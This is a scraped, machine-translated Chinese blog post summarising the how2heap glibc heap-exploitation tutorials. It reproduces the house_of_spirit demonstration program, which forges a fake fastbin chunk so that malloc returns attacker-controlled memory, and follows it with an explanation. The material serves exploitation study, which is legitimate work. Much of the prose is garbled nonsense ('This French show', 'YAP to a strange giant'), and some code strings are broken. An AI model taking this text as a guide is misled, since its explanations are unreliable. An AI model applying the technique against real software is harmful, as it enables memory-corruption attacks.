how2heap vulnerability technical research and analysis summary of-under-vulnerability warning-the black bar safety net

ID MYHACK58:62201789203
Type myhack58
Reporter 佚名
Modified 2017-09-11T00:00:00


"how2heap"is shellphish team at Github on the open source stack flaws tutorial series. I this period of time non-stop in the refresher heap of flaws in the application of common sense,to see these applied skills in the future feel rewarding. This article is my training this tutorial series after a summary,in this and all share. I'll just even the translation of the original version of the tutorial content,facilitate English not so good classmates and refresher. Not in further education these skills previously,the initiative for everyone to take a look at the Hua Ting wrote"Glibc memory governance-Ptmalloc2 source code in elucidating the" This also gives the original version of the tutorial link: Make up On the article of the summary, since in the micro-channel"number to send over, is not here made, to to my blog to see. Blog: reversing. win The translation Department I resolution and then with the nature of the mind, every word just even application I itself understood. And original some error of premises or perhaps ideographic unknown premises I will in the translation sector modified, if the original can not see too clearly, can see my translation. The latter is the output of sector I is not posted, everyone want to study of itself in the mechanical output on the look. :P 0x01 test case Ubuntu 16.04.3 LTS x64 GLIBC 2.23 0x02 contents house_of_spirit poison_null_byte house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsoted_bin_attack 0x03 house_of_spirit Source:



int main() { printf("This file demonstrates the house of spirit attack.\ n"); printf("Calling malloc() once so that it sets up its memory.\ n"); malloc(1); printf("We will now overwrite a pointer to point to a fake 'fastbin' region.\ n"); unsigned long long a; // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY) unsigned long long fake_chunks[10] attribute ((aligned (16))); printf("This region (the memory of the length: %lu) contains two chunks. The first starts at %p and the second at %p.\ n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]); printf("This chunk. the size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category ( "The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\ n"); printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. " "E. g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n"); fake_chunks[1] = 0x40; // this is the size printf("The chunk. the size of the next fake region has to be sane. That is > 2SIZE_SZ (> 16 on x64) && system_mem ( "to pass the nextsize integrity checks. No need for fastbin size.\ n"); // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8 fake_chunks[9] = 0x1234; // nextsize printf("Now we will overwrite our pointer with the address of the fake region inside the fake the first chunk, %p.\ n", &fake_chunks[1]); printf("... note that the memory address of the region associated with this chunk must be 16-byte aligned.\ n"); a = &fake_chunks[2]; printf("Freeing the overwritten pointer.\ n"); free(a); printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\ n", &fake_chunks[1], &fake_chunks[2]); printf("malloc(0x30): %p\n", malloc(0x30)); } Translation: This French show is called a house_of_spirit the onslaught method. Since the first diversion of a malloc to initialize the memory structure. We will be tampering with a pointer to point to a fake fastbin area. 1 unsigned long long fake_chunks[10] attribute ((aligned (16))); This area is a length of 0x50, the outside includes two chunk's. The first chunk beginning in fake_chunk[0],the second chunk start to fake_chunk[8]. Fig. The first chunk of the size you want in the fastbin the range of x64 on the machine is Because this chunk is let's pretend to be a fastbin, so PREV_INUSE is does not matter what free time does not cover this tag, but IS_MMAPPED and NON_MAIN_ARENA two flag is influential, to ensure that 0 on the line. Otherwise need to pay attention to that, we use malloc to request memory for the moment, the performance of the memory size parameter at the end is because of the alignment of the manipulation, so that we output the differences of the parameters can all YAP to a strange giant to the memory, like on a x64 machine We request 0x30~0x38 size of memory, the end of the age are YAP to give us 0x40 giant memory. So, if we want a 0x40 giant memory, following performance of the giant range of values can be used as malloc's parameter. Otherwise is the second fake chunk size must be greater than 2*size_t(x64 on the machine is 16 bytes, and must be less than the main arena of the giant, as usual is 128kb, in order to pass off the chunk can disorders of introspection. Then we will be free of the value of the pointer into a fake chunk locations fake_chunk[2]

[1] [2] [3] [4] [5] [6] [7] [8] [9] next